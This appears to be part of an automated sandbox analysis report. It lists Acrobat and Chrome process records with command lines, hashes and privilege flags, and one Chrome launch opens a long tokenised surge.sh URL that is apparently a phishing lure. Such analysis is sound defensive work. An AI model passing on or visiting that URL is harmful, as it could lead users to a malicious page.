                                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1704,i,521793384372817421,16056266662366640805,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff6c3ff0000
                                                                                                                                                                                                                                                                                          File size:3'581'912 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          Target ID:11
                                                                                                                                                                                                                                                                                          Start time:10:40:45
                                                                                                                                                                                                                                                                                          Start date:27/09/2024
                                                                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "https://equable-toothpaste.surge.sh/3p71OSuGgCok6FO7ZFUhEbb2gK9ZxuYZxdl2y8HSfVs0EX73KA1HgLgJ27HZhYYVRvyXf0wdADRdJRXB50aRUURx9Hm30U2w0fTUESK7HdbXMKiz1Lr9qbxMGWIab3H6h21Ta7aoVRUAo0LiDrfvUQsQM5QvPwbYFfyuMm64auSaaWLktuJtAYtcI5O7E95y0ss
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff6c4390000
                                                                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                          Target ID:12
                                                                                                                                                                                                                                                                                          Start time:10:40:47
                                                                                                                                                                                                                                                                                          Start date:27/09/2024
                                                                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2420 --field-trial-handle=2368,i,14601715867905608088,3878911157350375743,262144 /prefetch:8
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff6c4390000
                                                                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                          No disassembly